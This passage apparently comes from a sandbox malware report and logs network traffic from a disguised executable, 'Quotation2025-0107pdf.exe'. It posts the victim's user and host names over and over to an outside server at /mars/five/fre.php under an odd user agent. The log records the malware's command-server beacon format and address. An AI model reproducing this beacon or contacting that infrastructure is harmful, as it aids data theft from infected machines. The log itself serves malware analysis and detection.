                                                                                    Jan 7, 2025 12:32:25.829746008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:26.577548981 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:26 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.44977094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:26.718461037 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:26.723357916 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:27.430458069 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.44977194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:27.577661037 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:27.582509995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:28.316294909 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:28 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.44977294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:28.614263058 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:28.619054079 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:29.349251032 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:29 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.44977394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:29.499579906 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:29.504390001 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:30.221826077 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.44977494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:30.377583981 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:30.382420063 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:31.090928078 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.44977594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:31.250375986 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:31.256603003 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:31.988487959 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.44977694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:32.149305105 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:32.155613899 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:32.891259909 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:32 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.44977794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:33.028031111 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:33.032901049 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:33.772023916 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:33 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.44977894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:33.918819904 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:33.924411058 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:34.665445089 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:34 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.44977994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:34.809441090 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:34.814296961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:35.557409048 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:35 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.44978094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:35.699280977 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:35.704113960 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:36.434782982 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:36 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.44978194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:36.583699942 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:36.588546038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:37.324584961 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:37 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.44978294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:37.468777895 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:37.473583937 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:38.192630053 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:38 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.44978394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:38.355763912 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:38.360546112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:39.104120970 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:38 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.44978494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:39.248174906 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:39.253004074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:39.957216978 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:39 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.44978594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:40.109919071 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:40.116039038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:40.837862968 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:40 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.44978694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:40.982682943 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:40.987508059 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:41.705457926 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:41 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.44978794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:41.856955051 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:41.861753941 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:42.590842962 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:42 GMT
                                                                                    Content-Type: text/html; charset=utf-8
